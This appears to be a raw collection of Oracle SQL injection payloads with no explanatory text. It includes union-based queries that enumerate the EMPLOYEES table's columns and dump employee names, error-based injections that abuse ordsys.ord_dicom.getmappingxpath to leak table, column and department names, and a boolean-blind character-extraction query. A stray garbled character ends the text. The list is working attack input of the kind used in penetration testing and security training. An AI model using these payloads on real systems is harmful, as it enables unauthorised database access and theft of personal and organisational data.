1' or '1'='1' union select 1,column_name,'b','c','d','e' from all_tab_columns where table_name='EMPLOYEES' --


1' or '1'='1' union select 1,first_name,'b','c',last_name,'e' from (select rownum as rnum,first_name,last_name from employees) where rnum <= 10 --






1' or 1 = ordsys.ord_dicom.getmappingxpath((select table_name from (select rownum as rnum,table_name from user_tables) where rnum = 1))--

1' or 1 = ordsys.ord_dicom.getmappingxpath((select column_name from (select rownum as rnum,column_name from all_tab_columns where table_name='EMPLOYEES') where rnum = 1))--

1' or 1 = ordsys.ord_dicom.getmappingxpath((select department_name from (select rownum as rnum,department_name from departments) where rnum = 1))--


1' and 1 = (select ascii(substr((select table_name from (select rownum as rnum,table_name from user_tables) where rnum=3),1,1))) > 77--




â��